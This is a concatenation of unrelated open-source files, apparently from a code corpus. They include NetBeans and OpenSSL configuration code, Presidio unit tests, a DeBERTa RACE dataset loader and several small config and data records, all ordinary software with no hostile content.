org.netbeans.spi.java.queries.JavadocForBinaryQueryImplementation; import org.openide.filesystems.FileUtil; import org.openide.filesystems.URLMapper; import org.openide.util.Utilities; /** * Defines Javadoc locations for built modules with built javadoc. * @author <NAME> */ public final class JavadocForBinaryImpl implements JavadocForBinaryQueryImplementation { private static final String NB_ALL_INFIX = "nbbuild" + File.separatorChar + "build" + File.separatorChar + "javadoc" + File.separatorChar; // NOI18N private static final String EXT_INFIX = "build" + File.separatorChar + "javadoc" + File.separatorChar; // NOI18N /** Configurable for the unit test, since it is too cumbersome to create fake Javadoc in all the right places. */ static boolean ignoreNonexistentRoots = true; private final NbModuleProject project; public JavadocForBinaryImpl(NbModuleProject project) { this.project = project; } public JavadocForBinaryQuery.Result findJavadoc(URL binaryRoot) { if (!binaryRoot.equals(FileUtil.urlForArchiveOrDir(project.getModuleJarLocation()))) { return findForCPExt(binaryRoot); } String cnb = project.getCodeNameBase(); if (cnb == null) { // #115521 return null; } String cnbdashes = cnb.replace('.', '-'); try { final List<URL> candidates = new ArrayList<URL>(); NbPlatform platform = project.getPlatform(false); if (platform == null) { return null; } for (URL root : platform.getJavadocRoots()) { candidates.add(new URL(root, cnbdashes + "/")); // NOI18N } File dir; NbModuleType type = project.getModuleType(); if (type == NbModuleType.NETBEANS_ORG) { dir = project.getNbrootFile(NB_ALL_INFIX + cnbdashes); } else { // XXX should evaluate and use ${build.dir}/javadoc instead dir = new File(project.getProjectDirectoryFile(), EXT_INFIX + cnbdashes); } if (dir != null) { // #118491 candidates.add(FileUtil.urlForArchiveOrDir(dir)); } if (ignoreNonexistentRoots) { Iterator<URL> it = candidates.iterator(); while (it.hasNext()) { URL u = it.next(); if (URLMapper.findFileObject(u) == null) { it.remove(); } } } return new R(candidates.toArray(new URL[candidates.size()])); } catch (MalformedURLException e) { throw new AssertionError(e); } } /** * Find Javadoc roots for classpath extensions ("wrapped" JARs) of the project * added by naming convention <tt>&lt;jar name&gt;-javadoc(.zip)</tt> * See issue #66275 * @param binaryRoot * @return */ private Result findForCPExt(URL binaryRoot) { URL jar = FileUtil.getArchiveFile(binaryRoot); if (jar == null) return null; // not a class-path-extension File binaryRootF = Utilities.toFile(URI.create(jar.toExternalForm())); // XXX this will only work for modules following regular naming conventions: String n = binaryRootF.getName(); if (!n.endsWith(".jar")) { // NOI18N // ignore return null; } // convention-over-cfg per mkleint's suggestion: <jarname>-javadoc(.zip) folder or ZIP File jFolder = new File(binaryRootF.getParentFile(), n.substring(0, n.length() - ".jar".length()) + "-javadoc"); if (jFolder.isDirectory()) { return new R(new URL[]{FileUtil.urlForArchiveOrDir(jFolder)}); } else { File jZip = new File(jFolder.getAbsolutePath() + ".zip"); if (jZip.isFile()) { return new R(new URL[]{FileUtil.urlForArchiveOrDir(jZip)}); } } return null; } private static final class R implements JavadocForBinaryQuery.Result { private final URL[] roots; public R(URL[] roots) { this.roots = roots; } public URL[] getRoots() { return roots; } public void addChangeListener(ChangeListener l) {} public void removeChangeListener(ChangeListener l) {} } }
2,495
480
<filename>examples/protocols/cbor/example_test.py from __future__ import unicode_literals import re import textwrap import ttfw_idf @ttfw_idf.idf_example_test(env_tag='Example_WIFI') def test_examples_cbor(env, extra_data): dut = env.get_dut('cbor', 'examples/protocols/cbor') dut.start_app() dut.expect(re.compile(r'example: encoded buffer size \d+')) dut.expect('example: convert CBOR to JSON') parsed_info = dut.expect(re.compile(r'\[\{"chip":"(\w+)","unicore":(\w+),"ip":\[(\d+),(\d+),(\d+),(\d+)\]\},' r'3.1400001049041748' r',"simple\(99\)","2019-07-10 09:00:00\+0000","undefined"\]')) dut.expect('example: decode CBOR manually') dut.expect(re.compile(textwrap.dedent(r''' Array\[\s+ Map{{\s+ chip\s+ {}\s+ unicore\s+ {}\s+ ip\s+ Array\[\s+ {}\s+ {}\s+ {}\s+ {}\s+ \]\s+ }}\s+ 3.14\s+ simple\(99\)\s+ 2019-07-10 09:00:00\+0000\s+ undefined\s+ \]'''.format(*parsed_info)).replace('{', r'\{').replace('}', r'\}'))) if __name__ == '__main__': test_examples_cbor()
1,427
348
{"nom":"Commenailles","circ":"1ère circonscription","dpt":"Jura","inscrits":618,"abs":292,"votants":326,"blancs":18,"nuls":8,"exp":300,"res":[{"nuance":"REM","nom":"<NAME>","voix":223},{"nuance":"LR","nom":"<NAME>","voix":77}]}
87
480
<gh_stars>100-1000 /* * Copyright [2013-2021], Alibaba Group Holding Limited * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.alibaba.polardbx.executor.handler; import com.alibaba.polardbx.common.jdbc.ParameterContext; import com.alibaba.polardbx.executor.common.ExecutorContext; import com.alibaba.polardbx.executor.cursor.Cursor; import com.alibaba.polardbx.executor.cursor.impl.MultiCursorAdapter; import com.alibaba.polardbx.executor.spi.IRepository; import com.alibaba.polardbx.executor.utils.ExecUtils; import com.alibaba.polardbx.optimizer.context.ExecutionContext; import com.alibaba.polardbx.optimizer.core.rel.dal.BaseDalOperation; import com.alibaba.polardbx.optimizer.utils.QueryConcurrencyPolicy; import org.apache.calcite.rel.RelNode; import org.apache.commons.lang.StringUtils; import java.util.ArrayList; import java.util.List; import java.util.Map; /** * @author chenmo.cm */ public class BaseDalHandler extends HandlerCommon { public BaseDalHandler(IRepository repo) { super(repo); } @Override public Cursor handle(RelNode logicalPlan, ExecutionContext executionContext) { final BaseDalOperation dal = (BaseDalOperation) logicalPlan; if (dal.single()) { return repo.getCursorFactory().repoCursor(executionContext, logicalPlan); } return buildMultiCursor(executionContext, dal); } public Cursor buildMultiCursor(ExecutionContext executionContext, BaseDalOperation dal) { QueryConcurrencyPolicy queryConcurrencyPolicy = ExecUtils.getQueryConcurrencyPolicy(executionContext); List<Cursor> inputCursors = new ArrayList<>(); Map<Integer, ParameterContext> params = executionContext.getParams() == null ? null : executionContext.getParams() .getCurrentParameter(); List<RelNode> inputs = dal.getInput(params); Cursor baseDalCursor; String schemaName = dal.getSchemaName(); if (StringUtils.isEmpty(schemaName)) { schemaName = executionContext.getSchemaName(); } // NOT GROUP LEVEL ANYMORE, COZ UNION OPTIMIZATION WAS REMOVED, // NOW GROUP CONCURRENT BLOCK IS SAME AS FULL CONCURRENT if (QueryConcurrencyPolicy.GROUP_CONCURRENT_BLOCK.equals(queryConcurrencyPolicy)) { executeGroupConcurrent(executionContext, inputs, inputCursors, schemaName); } else { for (RelNode relNode : inputs) { inputCursors.add(ExecutorContext.getContext(schemaName) .getTopologyExecutor() .execByExecPlanNode(relNode, executionContext)); } } baseDalCursor = MultiCursorAdapter.wrap(inputCursors); return baseDalCursor; } }
1,209
394
#include "jumptoframecommand.h" #include "gitlivkcmdevt.h" JumpToFrameCommand::JumpToFrameCommand(QObject *parent) : GitlAbstractCommand(parent) { } bool JumpToFrameCommand::execute( GitlCommandParameter& rcInputArg, GitlCommandParameter& rcOutputArg ) { QVariant vValue = rcInputArg.getParameter("poc"); int iPoc = vValue.toInt(); /// ModelLocator* pModel = ModelLocator::getInstance(); ComSequence *pcCurSeq = pModel->getSequenceManager().getCurrentSequence(); if(pcCurSeq == NULL) return false; if( iPoc > pcCurSeq->getTotalFrames()-1 || iPoc < 0 ) { return false; } QPixmap* pcFramePixmap = pModel->getFrameBuffer().getFrame(iPoc); ///< Read Frame Buffer pcFramePixmap = pModel->getDrawEngine().drawFrame(pcCurSeq, iPoc, pcFramePixmap); ///< Draw Frame Buffer /// rcOutputArg.setParameter("picture", QVariant::fromValue((void*)(pcFramePixmap))); rcOutputArg.setParameter("current_frame_poc", iPoc); rcOutputArg.setParameter("total_frame_num", pcCurSeq->getTotalFrames()); return true; }
419
5,169
<filename>Specs/c/3/7/HYSDK/0.0.11/HYSDK.podspec.json { "name": "HYSDK", "version": "0.0.11", "summary": "幻意科技的ios客户端SDK", "description": "上海幻意科技的ios客户端SDK", "homepage": "https://gitee.com/morliaIT/HYSDL_iOS.git", "license": { "type": "MIT", "file": "LICENSE" }, "authors": { "<EMAIL>": "<EMAIL>" }, "platforms": { "ios": "10.0" }, "source": { "git": "https://gitee.com/morliaIT/HYSDL_iOS.git", "tag": "0.0.11" }, "resources": "Bundles/*.bundle", "swift_versions": "5.0", "frameworks": "SafariServices", "vendored_frameworks": [ "Frameworks/hysdk.framework", "Frameworks/NaverCafeSDK.framework", "Frameworks/FLAnimatedImage-1.0.12/FLAnimatedImage.framework", "Frameworks/NaverLogin-4.1.1/NaverLogin.framework", "Frameworks/SDWebImage-3.8.2/SDWebImage.framework" ], "requires_arc": true, "dependencies": { "FacebookCore": [ "~> 0.9.0" ], "FacebookLogin": [ "~> 0.9.0" ], "FacebookShare": [ "~> 0.9.0" ], "Firebase/Analytics": [ "~> 6.28.0" ] }, "swift_version": "5.0" }
571
4,538
<reponame>alibaba/AliOS-Things /* * Copyright (C) 2020-2021 Alibaba Group Holding Limited */ #ifndef AOS_TTY_H #define AOS_TTY_H #include <termios.h> #include <aos/device.h> typedef aos_dev_ref_t aos_tty_ref_t; #ifdef __cplusplus extern "C" { #endif /** * @brief Get a TTY device. * @param[out] ref TTY ref to operate * @param[in] id TTY device ID * @return 0: on success; < 0: on failure */ aos_status_t aos_tty_get(aos_tty_ref_t *ref, uint32_t id); /** * @brief Release a TTY device. * @param[in] ref TTY ref to operate * @return None */ void aos_tty_put(aos_tty_ref_t *ref); /** * @brief Get the parameters associated with a TTY device. * @param[in] ref TTY ref to operate * @param[out] termios POSIX-compliant termios struct * @return 0: on success; < 0: on failure */ aos_status_t aos_tty_get_attr(aos_tty_ref_t *ref, struct termios *termios); /** * @brief Set the parameters associated with a TTY device. * @param[in] ref TTY ref to operate * @param[in] optional_actions specifie when the changes take effect * @param[in] termios POSIX-compliant termios struct * @return 0: on success; < 0: on failure */ aos_status_t aos_tty_set_attr(aos_tty_ref_t *ref, int optional_actions, const struct termios *termios); /** * @brief Read data from a TTY device. * @param[in] ref TTY ref to operate * @param[out] buf data buffer * @param[in] count attempt to read up to count bytes * @param[in] timeout timeout in milliseconds * @return > 0: the number of bytes read; < 0: on failure */ ssize_t aos_tty_read(aos_tty_ref_t *ref, void *buf, size_t count, uint32_t timeout); /** * @brief Write data to a TTY device. * @param[in] ref TTY ref to operate * @param[in] buf data buffer * @param[in] count attempt to write up to count bytes * @param[in] timeout timeout in milliseconds * @return > 0: the number of bytes written; < 0: on failure */ ssize_t aos_tty_write(aos_tty_ref_t *ref, const void *buf, size_t count, uint32_t timeout); #ifdef __cplusplus } #endif #endif /* AOS_TTY_H */
898
660
/* * Copyright (c) 2019, Intel Corporation * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, sublicense, * and/or sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included * in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. */ //! //! \file decode_sub_packet_manager.cpp //! \brief Defines the common interface for decode sub packet manager implementation //! \details The decocode sub packet manager interface is further sub-divided by different packet usages, //! this file is for the base interface which is shared by all decode packets. //! #include "decode_sub_packet_manager.h" #include "decode_utils.h" namespace decode { DecodeSubPacketManager::~DecodeSubPacketManager() { for (auto subPacket : m_subPacketList) { MOS_Delete(subPacket.second); } m_subPacketList.clear(); } MOS_STATUS DecodeSubPacketManager::Register(uint32_t packetId, DecodeSubPacket& subPacket) { auto iter = m_subPacketList.find(packetId); DECODE_CHK_COND(iter != m_subPacketList.end(), "Failed to register sub packet %d", packetId); m_subPacketList.insert(std::make_pair(packetId, &subPacket)); return MOS_STATUS_SUCCESS; } DecodeSubPacket* DecodeSubPacketManager::GetSubPacket(uint32_t packetId) { auto iter = m_subPacketList.find(packetId); if (iter == m_subPacketList.end()) { return nullptr; } return iter->second; } MOS_STATUS DecodeSubPacketManager::Init() { for (auto subPacket : m_subPacketList) { subPacket.second->Init(); } return MOS_STATUS_SUCCESS; } MOS_STATUS DecodeSubPacketManager::Prepare() { for (auto subPacket : m_subPacketList) { subPacket.second->Prepare(); } return MOS_STATUS_SUCCESS; } }
901
4,057
# -*- coding: utf-8 -*- from django_extensions.management.jobs import MonthlyJob from unittest import mock MONTHLY_JOB_MOCK = mock.MagicMock() class Job(MonthlyJob): help = "My sample monthly job." def execute(self): MONTHLY_JOB_MOCK()
102
675
/* * Copyright 2012-2014 eBay Software Foundation and selendroid committers. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package io.selendroid.server.common.utils; import java.util.Set; import java.util.HashSet; public class SelendroidArguments { public static final String MAIN_ACTIVITY = "main_activity"; public static final String INTENT_URI = "intent_uri"; public static final String INTENT_ACTION = "intent_action"; public static final String SERVICE = "service"; public static final String LOAD_EXTENSIONS = "load_extensions"; public static final String BOOTSTRAP = "bootstrap"; public static final String SERVER_PORT = "server_port"; public static final Set<String> KNOWN_ARGUMENTS = new HashSet<String>(); static { KNOWN_ARGUMENTS.add(MAIN_ACTIVITY); KNOWN_ARGUMENTS.add(INTENT_URI); KNOWN_ARGUMENTS.add(INTENT_ACTION); KNOWN_ARGUMENTS.add(SERVICE); KNOWN_ARGUMENTS.add(LOAD_EXTENSIONS); KNOWN_ARGUMENTS.add(BOOTSTRAP); KNOWN_ARGUMENTS.add(SERVER_PORT); } }
476
1,408
<reponame>kubistika/presidio import pytest from presidio_analyzer import RecognizerResult @pytest.mark.parametrize( # fmt: off "start, end", [ (0, 10), (2, 8), (0, 8), (0, 10), ], # fmt: on ) def test_given_recognizer_results_then_one_contains_another(start, end): first = create_recognizer_result("", 0, 0, 10) second = create_recognizer_result("", 0, start, end) assert first.contains(second) @pytest.mark.parametrize( # fmt: off "start, end", [ (4, 10), (5, 11), (0, 5), (0, 6), ], # fmt: on ) def test_given_recognizer_result_then_they_do_not_contain_one_another(start, end): first = create_recognizer_result("", 0, 5, 10) second = create_recognizer_result("", 0, start, end) assert not first.contains(second) def test_given_recognizer_results_with_same_indices_then_indices_are_equal(): first = create_recognizer_result("", 0, 0, 10) second = create_recognizer_result("", 0, 0, 10) assert first.equal_indices(second) @pytest.mark.parametrize( # fmt: off "start, end", [ (4, 10), (5, 11), (0, 5), (0, 6), ], # fmt: on ) def test_given_recognizer_results_with_different_indices_then_indices_are_not_equal( start, end ): first = create_recognizer_result("", 0, 5, 10) second = create_recognizer_result("", 0, start, end) assert not first.equal_indices(second) def test_given_identical_recognizer_results_then_they_are_equal(): first = create_recognizer_result("bla", 0.2, 0, 10) second = create_recognizer_result("bla", 0.2, 0, 10) assert first == second @pytest.mark.parametrize( # fmt: off "entity_type, score, start, end", [ ("bla", 0.2, 4, 10), ("changed", 0.2, 0, 10), ("bla", 0.2, 0, 11), ("bla", 0.3, 0, 10), ], # fmt: on ) def test_given_different_recognizer_result_then_they_are_not_equal( entity_type, score, start, end ): first = create_recognizer_result("bla", 0.2, 0, 10) second = create_recognizer_result(entity_type, score, start, end) assert first != second def test_given_recognizer_result_then_their_hash_is_equal(): first = create_recognizer_result("", 0, 0, 10) second = create_recognizer_result("", 0, 0, 10) assert first.__hash__() == second.__hash__() @pytest.mark.parametrize( # fmt: off "entity_type, score, start, end", [ ("bla", 0.2, 4, 10), ("changed", 0.2, 0, 10), ("bla", 0.2, 0, 11), ("bla", 0.3, 0, 10), ], # fmt: on ) def test_given_different_recognizer_results_then_hash_is_not_equal( entity_type, score, start, end ): first = create_recognizer_result("bla", 0.2, 0, 10) second = create_recognizer_result(entity_type, score, start, end) assert first.__hash__() != second.__hash__() @pytest.mark.parametrize( # fmt: off "entity_type, score, start, end", [ ("bla", 0.2, 0, 10), ("changed", 0.2, 2, 10), ("bla", 0.3, 0, 11), ("bla", 0.1, 0, 10), ], # fmt: on ) def test_given_recognizer_results_with_conflicting_indices_then_there_is_a_conflict( entity_type, score, start, end ): first = create_recognizer_result("bla", 0.2, 2, 10) second = create_recognizer_result(entity_type, score, start, end) assert first.has_conflict(second) @pytest.mark.parametrize( # fmt: off "entity_type, score, start, end", [ ("bla", 0.2, 3, 10), ("changed", 0.1, 2, 10), ("bla", 0.3, 0, 9), ], # fmt: on ) def test_given_recognizer_results_with_no_conflicting_indices_then_there_is_no_conflict( entity_type, score, start, end ): first = create_recognizer_result("bla", 0.2, 2, 10) second = create_recognizer_result(entity_type, score, start, end) assert not first.has_conflict(second) def test_given_valid_json_for_creating_recognizer_result_then_creation_is_successful(): data = create_recognizer_result("NUMBER", 0.8, 0, 32) assert data.start == 0 assert data.end == 32 assert data.score == 0.8 assert data.entity_type == "NUMBER" @pytest.mark.parametrize( # fmt: off "start, end", [ (4, 10), (4, 9), (0, 2), (5, 9), ], # fmt: on ) def test_given_recognizer_results_then_one_is_greater_then_another(start, end): first = create_recognizer_result("", 0, 5, 10) second = create_recognizer_result("", 0, start, end) assert first.__gt__(second) @pytest.mark.parametrize( # fmt: off "start, end", [ (5, 10), (6, 12), (6, 7), ], # fmt: on ) def test_given_recognizer_result_then_one_is_not_greater_then_another(start, end): first = create_recognizer_result("", 0, 5, 10) second = create_recognizer_result("", 0, start, end) assert not first.__gt__(second) def create_recognizer_result(entity_type: str, score: float, start: int, end: int): data = {"entity_type": entity_type, "score": score, "start": start, "end": end} return RecognizerResult.from_json(data)
2,292
2,757
/* * Copyright 1995-2018 The OpenSSL Project Authors. All Rights Reserved. * * Licensed under the OpenSSL license (the "License"). You may not use * this file except in compliance with the License. You can obtain a copy * in the file LICENSE in the source distribution or at * https://www.openssl.org/source/license.html */ /* Part of the code in here was originally in conf.c, which is now removed */ #include "e_os.h" #include "internal/cryptlib.h" #include <stdlib.h> #include <string.h> #include <openssl/conf.h> #include <openssl/conf_api.h> static void value_free_hash(const CONF_VALUE *a, LHASH_OF(CONF_VALUE) *conf); static void value_free_stack_doall(CONF_VALUE *a); /* Up until OpenSSL 0.9.5a, this was get_section */ CONF_VALUE *_CONF_get_section(const CONF *conf, const char *section) { CONF_VALUE *v, vv; if ((conf == NULL) || (section == NULL)) return (NULL); vv.name = NULL; vv.section = (char *)section; v = lh_CONF_VALUE_retrieve(conf->data, &vv); return (v); } /* Up until OpenSSL 0.9.5a, this was CONF_get_section */ STACK_OF(CONF_VALUE) *_CONF_get_section_values(const CONF *conf, const char *section) { CONF_VALUE *v; v = _CONF_get_section(conf, section); if (v != NULL) return ((STACK_OF(CONF_VALUE) *)v->value); else return (NULL); } int _CONF_add_string(CONF *conf, CONF_VALUE *section, CONF_VALUE *value) { CONF_VALUE *v = NULL; STACK_OF(CONF_VALUE) *ts; ts = (STACK_OF(CONF_VALUE) *)section->value; value->section = section->section; if (!sk_CONF_VALUE_push(ts, value)) { return 0; } v = lh_CONF_VALUE_insert(conf->data, value); if (v != NULL) { (void)sk_CONF_VALUE_delete_ptr(ts, v); OPENSSL_free(v->name); OPENSSL_free(v->value); OPENSSL_free(v); } return 1; } char *_CONF_get_string(const CONF *conf, const char *section, const char *name) { CONF_VALUE *v, vv; char *p; if (name == NULL) return (NULL); if (conf != NULL) { if (section != NULL) { vv.name = (char *)name; vv.section = (char *)section; v = lh_CONF_VALUE_retrieve(conf->data, &vv); if (v != NULL) return (v->value); if (strcmp(section, "ENV") == 0) { p = ossl_safe_getenv(name); if (p != NULL) return (p); } } vv.section = "default"; vv.name = (char *)name; v = lh_CONF_VALUE_retrieve(conf->data, &vv); if (v != NULL) return (v->value); else return (NULL); } else return ossl_safe_getenv(name); } static unsigned long conf_value_hash(const CONF_VALUE *v) { return (OPENSSL_LH_strhash(v->section) << 2) ^ OPENSSL_LH_strhash(v->name); } static int conf_value_cmp(const CONF_VALUE *a, const CONF_VALUE *b) { int i; if (a->section != b->section) { i = strcmp(a->section, b->section); if (i) return (i); } if ((a->name != NULL) && (b->name != NULL)) { i = strcmp(a->name, b->name); return (i); } else if (a->name == b->name) return (0); else return ((a->name == NULL) ? -1 : 1); } int _CONF_new_data(CONF *conf) { if (conf == NULL) { return 0; } if (conf->data == NULL) { conf->data = lh_CONF_VALUE_new(conf_value_hash, conf_value_cmp); if (conf->data == NULL) return 0; } return 1; } typedef LHASH_OF(CONF_VALUE) LH_CONF_VALUE; IMPLEMENT_LHASH_DOALL_ARG_CONST(CONF_VALUE, LH_CONF_VALUE); void _CONF_free_data(CONF *conf) { if (conf == NULL || conf->data == NULL) return; /* evil thing to make sure the 'OPENSSL_free()' works as expected */ lh_CONF_VALUE_set_down_load(conf->data, 0); lh_CONF_VALUE_doall_LH_CONF_VALUE(conf->data, value_free_hash, conf->data); /* * We now have only 'section' entries in the hash table. Due to problems * with */ lh_CONF_VALUE_doall(conf->data, value_free_stack_doall); lh_CONF_VALUE_free(conf->data); } static void value_free_hash(const CONF_VALUE *a, LHASH_OF(CONF_VALUE) *conf) { if (a->name != NULL) (void)lh_CONF_VALUE_delete(conf, a); } static void value_free_stack_doall(CONF_VALUE *a) { CONF_VALUE *vv; STACK_OF(CONF_VALUE) *sk; int i; if (a->name != NULL) return; sk = (STACK_OF(CONF_VALUE) *)a->value; for (i = sk_CONF_VALUE_num(sk) - 1; i >= 0; i--) { vv = sk_CONF_VALUE_value(sk, i); OPENSSL_free(vv->value); OPENSSL_free(vv->name); OPENSSL_free(vv); } sk_CONF_VALUE_free(sk); OPENSSL_free(a->section); OPENSSL_free(a); } /* Up until OpenSSL 0.9.5a, this was new_section */ CONF_VALUE *_CONF_new_section(CONF *conf, const char *section) { STACK_OF(CONF_VALUE) *sk = NULL; int i; CONF_VALUE *v = NULL, *vv; if ((sk = sk_CONF_VALUE_new_null()) == NULL) goto err; if ((v = OPENSSL_malloc(sizeof(*v))) == NULL) goto err; i = strlen(section) + 1; if ((v->section = OPENSSL_malloc(i)) == NULL) goto err; memcpy(v->section, section, i); v->name = NULL; v->value = (char *)sk; vv = lh_CONF_VALUE_insert(conf->data, v); OPENSSL_assert(vv == NULL); if (lh_CONF_VALUE_error(conf->data) > 0) goto err; return v; err: sk_CONF_VALUE_free(sk); if (v != NULL) OPENSSL_free(v->section); OPENSSL_free(v); return NULL; }
2,702
27,066
package com.xkcoding.dynamic.datasource.datasource; import com.zaxxer.hikari.HikariDataSource; import lombok.Getter; import java.time.LocalDateTime; /** * <p> * 数据源管理类 * </p> * * @author yangkai.shen * @date Created in 2019-09-04 14:27 */ public class DatasourceManager { /** * 默认释放时间 */ private static final Long DEFAULT_RELEASE = 10L; /** * 数据源 */ @Getter private HikariDataSource dataSource; /** * 上一次使用时间 */ private LocalDateTime lastUseTime; public DatasourceManager(HikariDataSource dataSource) { this.dataSource = dataSource; this.lastUseTime = LocalDateTime.now(); } /** * 是否已过期,如果过期则关闭数据源 * * @return 是否过期,{@code true} 过期,{@code false} 未过期 */ public boolean isExpired() { if (LocalDateTime.now().isBefore(this.lastUseTime.plusMinutes(DEFAULT_RELEASE))) { return false; } this.dataSource.close(); return true; } /** * 刷新上次使用时间 */ public void refreshTime() { this.lastUseTime = LocalDateTime.now(); } }
600
435
{ "copyright_text": null, "description": "", "duration": 6964, "language": "eng", "recorded": "2015-04-24", "related_urls": [ { "label": "Conference schedule", "url": "https://pydata.org/dal2015/schedule/" } ], "speakers": [], "tags": [], "thumbnail_url": "https://i.ytimg.com/vi/nar7u17qkOU/maxresdefault.jpg", "title": "<NAME> and <NAME> - Building Python Data Applications with Blaze and Bokeh", "videos": [ { "type": "youtube", "url": "https://www.youtube.com/watch?v=nar7u17qkOU" } ] }
243
916
# # Author: <EMAIL> # Date: 01/25/2019 # from glob import glob from collections import OrderedDict,defaultdict,Sequence import copy import math from scipy.special import softmax import numpy as np import pdb import os import sys import csv import random import torch import re import ujson as json from DeBERTa.apps.tasks.metrics import * from DeBERTa.apps.tasks import EvalData, Task,register_task from DeBERTa.utils import xtqdm as tqdm from DeBERTa.data import ExampleInstance, ExampleSet, DynamicDataset,example_to_feature from DeBERTa.data.example import * from DeBERTa.utils import get_logger from DeBERTa.data.example import _truncate_segments from DeBERTa.apps.models.multi_choice import MultiChoiceModel logger=get_logger() __all__ = ["MyRACETask"] @register_task(name="MyRACE", desc="ReAding Comprehension dataset collected from English Examinations, http://www.qizhexie.com/data/RACE_leaderboard.html") class MyRACETask(Task): def __init__(self, data_dir, tokenizer, args, **kwargs): super().__init__(tokenizer, args, **kwargs) self.data_dir = data_dir def train_data(self, max_seq_len=512, dataset_size=None, epochs=1, mask_gen=None, **kwargs): middle = self.load_jsonl(os.path.join(self.data_dir, 'train_middle.jsonl')) high = self.load_jsonl(os.path.join(self.data_dir, 'train_high.jsonl')) examples = ExampleSet(middle + high) if dataset_size is None: dataset_size = len(examples)*epochs return DynamicDataset(examples, feature_fn = self.get_feature_fn(max_seq_len=max_seq_len, mask_gen=mask_gen), \ dataset_size = dataset_size, shuffle=True, **kwargs) def eval_data(self, max_seq_len=512, dataset_size=None, **kwargs): ds = [ self._data('test-high', 'test_high.jsonl', 'test', ignore_metric=True), self._data('test-middle', 'test_middle.jsonl', 'test', ignore_metric=True), self._data('test', ['test_middle.jsonl', 'test_high.jsonl'], 'test'), ] for d in ds: if dataset_size is None: _size = len(d.data) d.data = DynamicDataset(d.data, feature_fn = self.get_feature_fn(max_seq_len=max_seq_len), dataset_size = _size, **kwargs) return ds def test_data(self,max_seq_len=512, dataset_size = None, **kwargs): """See base class.""" ds = [ self._data('high', 'test_high.jsonl', 'test'), self._data('middle', 'test_middle.jsonl', 'test'), ] for d in ds: if dataset_size is None: _size = len(d.data) d.data = DynamicDataset(d.data, feature_fn = self.get_feature_fn(max_seq_len=max_seq_len), dataset_size = _size, **kwargs) return ds def _data(self, name, path, type_name = 'dev', ignore_metric=False): if isinstance(path, str): path = [path] data = [] for p in path: input_src = os.path.join(self.data_dir, p) assert os.path.exists(input_src), f"{input_src} doesn't exists" data.extend(self.load_jsonl(input_src)) predict_fn = self.get_predict_fn() examples = ExampleSet(data) return EvalData(name, examples, metrics_fn = self.get_metrics_fn(), predict_fn = predict_fn, ignore_metric=ignore_metric, critial_metrics=['accuracy']) def get_metrics_fn(self): """Calcuate metrics based on prediction results""" def metrics_fn(logits, labels): metrics = OrderedDict(accuracy= metric_accuracy(logits, labels)) return metrics return metrics_fn def get_labels(self): """See base class.""" return ["A", "B", "C", "D"] def load_jsonl(self, path): examples = [] with open(path, encoding='utf-8') as fs: data = [json.loads(l) for l in fs] for d in data: page = d["article"] for q,o,a in zip(d["questions"], d["options"], d["answers"]): example = ExampleInstance(segments=[page, q, *o], label=self.label2id(a)) examples.append(example) return examples def get_feature_fn(self, max_seq_len = 512, mask_gen = None): def _example_to_feature(example, rng=None, ext_params=None, **kwargs): return self.example_to_feature(self.tokenizer, example, max_seq_len = max_seq_len, \ rng = rng, mask_generator = mask_gen, ext_params = ext_params, **kwargs) return _example_to_feature def example_to_feature(self, tokenizer, example, max_seq_len=512, rng=None, mask_generator = None, ext_params=None, label_type='int', **kwargs): if not rng: rng = random max_num_tokens = max_seq_len - 3 def _normalize(text): text = re.sub(r'\s+', ' ', text.strip('\t \r\n_').replace('\n', ' ')).strip() return text # page,question,options context = tokenizer.tokenize(_normalize(example.segments[0])) features = OrderedDict(input_ids = [], type_ids = [], position_ids = [], input_mask = []) for option in example.segments[2:]: #TODO: truncate question = example.segments[1] qa_cat = " ".join([question, option]) qa_cat = tokenizer.tokenize(_normalize(qa_cat))[:160] segments = [context, qa_cat] segments = _truncate_segments(segments, max_num_tokens, rng) tokens = ['[CLS]'] type_ids = [0] for i,s in enumerate(segments): tokens.extend(s) tokens.append('[SEP]') type_ids.extend([i]*(len(s)+1)) token_ids = tokenizer.convert_tokens_to_ids(tokens) pos_ids = list(range(len(token_ids))) rel_pos = [] input_mask = [1]*len(token_ids) features['input_ids'].append(token_ids) features['type_ids'].append(type_ids) features['position_ids'].append(pos_ids) features['input_mask'].append(input_mask) padding_size = max(0, max_seq_len - len(token_ids)) for f in features: features[f][-1].extend([0]*padding_size) for f in features: features[f] = torch.tensor(features[f], dtype=torch.int) if example.label is not None: label_type = torch.int if label_type=='int' else torch.float features['labels'] = torch.tensor(example.label, dtype=label_type) return features def get_model_class_fn(self): def partial_class(*wargs, **kwargs): return MultiChoiceModel.load_model(*wargs, **kwargs) return partial_class @classmethod def add_arguments(cls, parser): """Add task specific arguments e.g. parser.add_argument('--data_dir', type=str, help='The path of data directory.') """ parser.add_argument('--task_example_arg', type=str, default=None, help='An example task specific argument') return parser
2,662
342
